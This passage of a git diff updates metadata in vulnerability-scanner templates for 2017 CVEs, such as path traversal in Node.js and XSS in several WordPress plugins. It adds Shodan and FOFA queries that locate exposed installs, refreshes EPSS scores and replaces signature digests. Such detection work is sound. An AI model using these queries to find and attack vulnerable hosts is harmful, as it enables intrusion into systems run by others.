cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-14849
cwe-id: CWE-22
epss-score: 0.96684
- epss-percentile: 0.99566
+ epss-percentile: 0.99644
cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: nodejs
product: node.js
+ shodan-query: cpe:"cpe:2.3:a:nodejs:node.js"
tags: cve2017,cve,nodejs,lfi
http:
@@ -42,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cc70e1874f9cb05ffce4e903656bec52da2f4c00911ce81bf12be3d78825a7740221008cc52739137460a82d8edee7d9310d0397e83e70cc1bd5c4934b0a662204180d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml
index cae97e7f8a..d40588030d 100644
--- a/http/cves/2017/CVE-2017-15715.yaml
+++ b/http/cves/2017/CVE-2017-15715.yaml
@@ -27,6 +27,7 @@ info:
max-request: 2
vendor: apache
product: http_server
+ shodan-query: cpe:"cpe:2.3:a:apache:http_server"
tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive
http:
@@ -56,4 +57,4 @@ http:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
-# digest: 4b0a00483046022100ae5641ddd92e3d444dbbb35c3b15e833ad880957167aa6fad3e696b3f05e57d6022100a1460cf01679d7a517dba54d83abe3fa648044075c4c3c88058ee7687bb5a231:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e5b95914f4e3f82442439819350bfd0593af2bcbe7c4d94b1f3675ef1b8e5f7e0221008e6d536d529afde82250bb64cee8c324357d63dd2d4b090af6bdac0951e85760:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml
index 7b6d9d5a2a..6353771b11 100644
--- a/http/cves/2017/CVE-2017-15944.yaml
+++ b/http/cves/2017/CVE-2017-15944.yaml
@@ -26,6 +26,8 @@ info:
max-request: 1
vendor: paloaltonetworks
product: pan-os
+ fofa-query: icon_hash="-631559155"
+ shodan-query: http.favicon.hash:"-631559155"
tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks
http:
@@ -45,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e0ebb82c78017bace95bb6bdbbd956c0ceefa723b30e23eaf66e133c3671020b02201e43c7c0e0a433896c4df5cfcc72d35bc21c5ead69bbb1c20e4903dc8d6705a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207b6986aaa6889e0462da1d7774c50f898c54663ba26b806cbbb8d02f7f8620f2022000dcf8a3535abbb6d12f598df23e35247ff5fcfca180b1025dd7bc918e855643:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml
index 95bebe1838..00fbc8046d 100644
--- a/http/cves/2017/CVE-2017-16806.yaml
+++ b/http/cves/2017/CVE-2017-16806.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-16806
cwe-id: CWE-22
epss-score: 0.07105
- epss-percentile: 0.93842
+ epss-percentile: 0.93981
cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -47,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220248d3a025910d7531fbfc6d9b3fa5dc68f2b52eb6ee83db505034ca0c5eaf5b6022073f53caec34066a4d897600b5ab38dd8983378f8db55127c30cc96bc041d373e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml
index 8904a4eeb1..18eff63188 100644
--- a/http/cves/2017/CVE-2017-16877.yaml
+++ b/http/cves/2017/CVE-2017-16877.yaml
@@ -26,6 +26,8 @@ info:
max-request: 1
vendor: zeit
product: next.js
+ shodan-query: http.html:"/_next/static"
+ fofa-query: body="/_next/static"
tags: cve,cve2017,nextjs,lfi,traversal,zeit
http:
@@ -44,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c250b9c908590d5296d8fd48225795617103cff1b0a0082f49eccc4317ef7c2e022100f718c49e8cd4c13a059b632b35040a5391bb6a6714822a1348371aa8b2d51137:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d9730b947db3bb1357d5caa71c56f2d389c56fa519be8a994ae6d432533f49be022002444ed6379e5c2600c10f50fb2580bd67bf226204375dac092d07dbbca2d1f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml
index 1bcbc76088..1bad04ee13 100644
--- a/http/cves/2017/CVE-2017-17043.yaml
+++ b/http/cves/2017/CVE-2017-17043.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-17043
cwe-id: CWE-79
epss-score: 0.00245
- epss-percentile: 0.63923
+ epss-percentile: 0.64551
cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: emag_marketplace_connector
framework: wordpress
tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec
-
flow: http(1) && http(2)
http:
@@ -62,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203013773f07b32293d187ef5593c809c0d5b199d0535add43a30b9558d54ad34b0220793cad7ec1c8c9661bbcec6319fcac9cd92006ed78d1f46ccc76dca5de51cb18:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022031c15c11202c7964366d60e629a94726935eb45208e9d1342418855dd021e4fc022100a7b7f0a3a0ab2dbcad54dc28a88cbfbb1b98b72d7b8dcfd03519b8a935dd99de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml
index 281396a53a..81239b67f7 100644
--- a/http/cves/2017/CVE-2017-17059.yaml
+++ b/http/cves/2017/CVE-2017-17059.yaml
@@ -13,13 +13,14 @@ info:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-17059
cwe-id: CWE-79
- epss-score: 0.00261
- epss-percentile: 0.63794
+ epss-score: 0.00242
+ epss-percentile: 0.642
cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -27,7 +28,6 @@ info:
product: amtythumb
framework: wordpress
tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project
-
flow: http(1) && http(2)
http:
@@ -66,4 +66,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022074f0b24a9cb480e81960e319cc7ee19b77dec9226fe67fb84ef549e875531ccb022100d2da121efbde5f1678796a09a5a402923ee1a4b01df208e0d978251d20b71f1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f214539df64786c3d52922e14c4c9d2e8766c6bed71928bb04a9c9dc07fb4e53022100e31456e1f51b587f652c6f75dd3239fd76a2a90af5b0c6fa4b9ed64469bbc8a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml
index 700e1be344..e4bd532644 100644
--- a/http/cves/2017/CVE-2017-17451.yaml
+++ b/http/cves/2017/CVE-2017-17451.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-17451
cwe-id: CWE-79
epss-score: 0.00178
- epss-percentile: 0.55144
+ epss-percentile: 0.54962
cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: wp_mailster
framework: wordpress
tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster
-
flow: http(1) && http(2)
http:
@@ -63,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ec046f9a81c101fb374ae81bf7e992adeec3cc8e98a3583295368cde81c2129e022100a1232b8f02f87a0a260815390cb7e841d202487f1b339d81ed1212cc8af179de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a0ddbaf09b68c68b39dfffbe86e40890a1e47752592d33d12f9defe516d7f841022100962efc1e1ab9bd391c8f3f57a1671572a0750fefa25c9c3a2e86d2c923275973:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml
index 4bfef0fdf6..364410874d 100644
--- a/http/cves/2017/CVE-2017-17562.yaml
+++ b/http/cves/2017/CVE-2017-17562.yaml
@@ -28,6 +28,7 @@ info:
max-request: 65
vendor: embedthis
product: goahead
+ shodan-query: cpe:"cpe:2.3:a:embedthis:goahead"
tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis
http:
@@ -117,4 +118,4 @@ http:
- type: status
status:
- 200
-# digest: 480a004530430220137571f29820e7cfeff24983e553083fbd48df32ed6c9f6be7ab7a0b2ab3dcec021f1cf2aba6f6d18369d6d6d6784a620d36863b9446b26c941818edd6a6a12322:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a0718d9f04bc6d15d22ac54b93c6f567b67f15d01f50cee17d7f3571416b85140220106a40ed475fcb76830332c3c1044593fc378ecc06198d8f747cee8305851a5b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml
index bf8b0e1e71..7ee2be835e 100644
--- a/http/cves/2017/CVE-2017-17736.yaml
+++ b/http/cves/2017/CVE-2017-17736.yaml
@@ -30,6 +30,8 @@ info:
vendor: kentico
product: kentico_cms
google-query: intitle:"kentico database setup"
+ shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms"
+ fofa-query: title="kentico database setup"
tags: cve2017,cve,kentico,cms,install,unauth,edb
http:
@@ -51,4 +53,4 @@ http:
- "Database Setup"
- "SQLServer"
condition: and
-# digest: 4a0a00473045022100ad66c367e331e508a9f4b8fa4a02f983e9f099aeadd13065ad5c5afce55ef49c022066cea12a22089ef4211b14cd43c45a6ee5a3d7ba24ae488ba1f0f9d108f68fcc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d8ad1f8a03b92de7bc6cebf760d69d12729198d8fcbfa54e5e09cd9e4cfe1aba022100bc14286072cd2f87dad9e6d870daeac4050ae6d77f50a967de331b947f904ecc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml
index 3f5b40e325..4e6e16b60b 100644
--- a/http/cves/2017/CVE-2017-18024.yaml
+++ b/http/cves/2017/CVE-2017-18024.yaml
@@ -21,12 +21,15 @@ info:
cve-id: CVE-2017-18024
cwe-id: CWE-79
epss-score: 0.00074
- epss-percentile: 0.30209
+ epss-percentile: 0.31612
cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: avantfax
product: avantfax
+ shodan-query: http.title:"avantfax - login"
+ fofa-query: title="avantfax - login"
+ google-query: intitle:"avantfax - login"
tags: cve,cve2017,avantfax,hackerone,packetstorm,xss
http:
@@ -55,4 +58,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bf464ae1865ebdfc07eca5805af2e4ef8b10d1f7751f62adb5de2c0c9476687602207e8e107717c8972c0c2a91ccf68984488b5bf04de54c3e3bdfd1598beacbf8af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml
index 8f9ac61405..c57bb085a4 100644
--- a/http/cves/2017/CVE-2017-18487.yaml
+++ b/http/cves/2017/CVE-2017-18487.yaml
@@ -26,6 +26,8 @@ info:
product: google_adsense
framework: wordpress
publicwww-query: "/wp-content/plugins/adsense-plugin/"
+ shodan-query: http.html:/wp-content/plugins/adsense-plugin/
+ fofa-query: body=/wp-content/plugins/adsense-plugin/
tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Google AdSense")'
condition: and
-# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2f144543f909a5615a872d0bd6f175f8d7481b76040c77d249082c14cdd77b5022100a45e78dd4bacbe1a90ff470b53c32cb5747094df301236a60c0aa95bbbb15a3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml
index bcbe1eff61..fe6fceb759 100644
--- a/http/cves/2017/CVE-2017-18490.yaml
+++ b/http/cves/2017/CVE-2017-18490.yaml
@@ -26,6 +26,8 @@ info:
product: contact_form_multi
framework: wordpress
publicwww-query: "/wp-content/plugins/contact-form-multi/"
+ shodan-query: http.html:/wp-content/plugins/contact-form-multi/
+ fofa-query: body=/wp-content/plugins/contact-form-multi/
tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Contact Form Multi by")'
condition: and
-# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220309d50219f298d7eea07a19c9191ff46c8a45c69b74b58d89a0ad909e927783f022057edf5a64e245323e5dd0e27cbc7b15cc446f824ab7fc1cd11d7ccf9bd8c0a6d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml
index 73517d0595..647c706979 100644
--- a/http/cves/2017/CVE-2017-18491.yaml
+++ b/http/cves/2017/CVE-2017-18491.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18491
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: contact_form
framework: wordpress
publicwww-query: "/wp-content/plugins/contact-form-plugin/"
+ shodan-query: http.html:/wp-content/plugins/contact-form-plugin/
+ fofa-query: body=/wp-content/plugins/contact-form-plugin/
tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Contact Form by")'
condition: and
-# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205922464cb9b082012a5717f6ae4a5c781c09d72276c4a13f00c395e2341c4940022100c3b722a4063eb9e67e300cbbc803ae02cdfd639fc0a887d6ed676e3a54f6ed23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml
index c7fa05e53a..0e3351d0c6 100644
--- a/http/cves/2017/CVE-2017-18492.yaml
+++ b/http/cves/2017/CVE-2017-18492.yaml
@@ -26,6 +26,8 @@ info:
product: contact_form_to_db
framework: wordpress
publicwww-query: "/wp-content/plugins/contact-form-to-db/"
+ shodan-query: http.html:/wp-content/plugins/contact-form-to-db/
+ fofa-query: body=/wp-content/plugins/contact-form-to-db/
tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Contact Form to DB by")'
condition: and
-# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b6bb8513bced954e51008a530b0724db84f61bb3f0b140ea5002a674017aca9002204ee548db86017b15989be9df5eb8e52e0e4f1a68864352638af2ad67bcc245c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml
index 0d6b511623..19c0261467 100644
--- a/http/cves/2017/CVE-2017-18493.yaml
+++ b/http/cves/2017/CVE-2017-18493.yaml
@@ -26,6 +26,8 @@ info:
product: custom_admin_page
framework: wordpress
publicwww-query: "/wp-content/plugins/custom-admin-page/"
+ shodan-query: http.html:/wp-content/plugins/custom-admin-page/
+ fofa-query: body=/wp-content/plugins/custom-admin-page/
tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Custom Admin Page by")'
condition: and
-# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d6fe80f9f7d1aab556e1036f8defebeba6ea11c63f16d34b04afe90e95f4546202200808bf2577b4a08b4780aadbaa4011e1d3f8550e44937ddcb47fe5b3d221cb83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml
index f35075d372..6efe86ae09 100644
--- a/http/cves/2017/CVE-2017-18494.yaml
+++ b/http/cves/2017/CVE-2017-18494.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18494
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36857
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: custom_search
framework: wordpress
publicwww-query: "/wp-content/plugins/custom-search-plugin/"
+ shodan-query: http.html:/wp-content/plugins/custom-search-plugin/
+ fofa-query: body=/wp-content/plugins/custom-search-plugin/
tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Custom Search by")'
condition: and
-# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206317d36f774a6e18918ff1f1e37f50249a0ce640d5a5516998ede088be17bb1a022100f0d31a71b6bc8cf142d888decd4c4a769997873f78303ea4b9a06ea6be1581e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml
index 9cd3d64dfa..6b6cb879c5 100644
--- a/http/cves/2017/CVE-2017-18496.yaml
+++ b/http/cves/2017/CVE-2017-18496.yaml
@@ -26,6 +26,8 @@ info:
product: htaccess
framework: wordpress
publicwww-query: "/wp-content/plugins/htaccess/"
+ shodan-query: http.html:/wp-content/plugins/htaccess/
+ fofa-query: body=/wp-content/plugins/htaccess/
tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Htaccess by")'
condition: and
-# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d15d88b20dc2025c1222de29bcdcb7f8e8d30287102244dd47259b4709bdd539022074e861018f6c2c65de07cd24dab9c02ffea05aec9e96e88314e17857f73270eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml
index d1554790f4..47d08c7d21 100644
--- a/http/cves/2017/CVE-2017-18500.yaml
+++ b/http/cves/2017/CVE-2017-18500.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18500
cwe-id: CWE-79
epss-score: 0.00231
- epss-percentile: 0.60522
+ epss-percentile: 0.61183
cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: social_buttons_pack
framework: wordpress
publicwww-query: "/wp-content/plugins/social-buttons-pack/"
+ shodan-query: http.html:/wp-content/plugins/social-buttons-pack/
+ fofa-query: body=/wp-content/plugins/social-buttons-pack/
tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Social Buttons Pack by")'
condition: and
-# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e023710fd2cddcb7031ad7fba8662510eaeed9e5faafbd42d85dd970f2d8ee0202202366661999f0a17500a912412bd4d032a998c89376f68bf9607137adec9e75e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml
index 7f84a097f0..7af4ac0a0d 100644
--- a/http/cves/2017/CVE-2017-18501.yaml
+++ b/http/cves/2017/CVE-2017-18501.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18501
cwe-id: CWE-79
epss-score: 0.00231
- epss-percentile: 0.60522
+ epss-percentile: 0.61183
cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: social_login
framework: wordpress
publicwww-query: "/wp-content/plugins/social-login-bws/"
+ shodan-query: http.html:/wp-content/plugins/social-login-bws/
+ fofa-query: body=/wp-content/plugins/social-login-bws/
tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Social Login by")'
condition: and
-# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b926cdd9c0ccc5dd9db56d2d1011d94f6bcb665e4215f9b90fc954268a35f671022100fa7f0cc871a66086020b70e8d3c2f1f862fe6497f6174e0101aa0c4c9b9bedd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml
index c6c6d10ba6..702e3f5399 100644
--- a/http/cves/2017/CVE-2017-18502.yaml
+++ b/http/cves/2017/CVE-2017-18502.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2017-18502
cwe-id: CWE-79
epss-score: 0.00231
- epss-percentile: 0.61251
+ epss-percentile: 0.61183
cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -26,6 +26,8 @@ info:
product: subscriber
framework: wordpress
publicwww-query: "/wp-content/plugins/subscriber/"
+ shodan-query: http.html:/wp-content/plugins/subscriber/
+ fofa-query: body=/wp-content/plugins/subscriber/
tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Subscriber by")'
condition: and
-# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206e4b864003dd64c21ddbc07de1eae42df292cce45d23b04ff0a705050c7d6fee022069151f539cdd3d0ffcc2d3de11e35b01a3f9d076a033bc2f9506cedef12a0431:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml
index 93ddcfad77..58b79a5aef 100644
--- a/http/cves/2017/CVE-2017-18505.yaml
+++ b/http/cves/2017/CVE-2017-18505.yaml
@@ -26,6 +26,8 @@ info:
product: twitter_button
framework: wordpress
publicwww-query: "/wp-content/plugins/twitter-plugin/"
+ shodan-query: http.html:/wp-content/plugins/twitter-plugin/
+ fofa-query: body=/wp-content/plugins/twitter-plugin/
tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft
http:
@@ -51,4 +53,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "Twitter Button by")'
condition: and
-# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022100dcf0b1872f1e4b503b0af45ff58d2dd2d63f7c318e856f62fa9e9e737b583dcc021f756676a67d113a71da4ccd4e3136fc5299b660be6ff05f647b675444fe0f9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml
index bedf2a9ea8..3a88b0d928 100644
--- a/http/cves/2017/CVE-2017-18516.yaml
+++ b/http/cves/2017/CVE-2017-18516.yaml
@@ -18,7 +18,7 @@ info:
cve-id: CVE-2017-18516
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36836
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -27,6 +27,8 @@ info:
product: linkedin
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-linkedin/"
+ shodan-query: http.html:/wp-content/plugins/bws-linkedin/
+ fofa-query: body=/wp-content/plugins/bws-linkedin/
tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft
http:
@@ -52,4 +54,4 @@ http:
- 'contains(body_2, ">\">All")'
- 'contains(body_3, "LinkedIn by BestWebSoft")'
condition: and
-# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
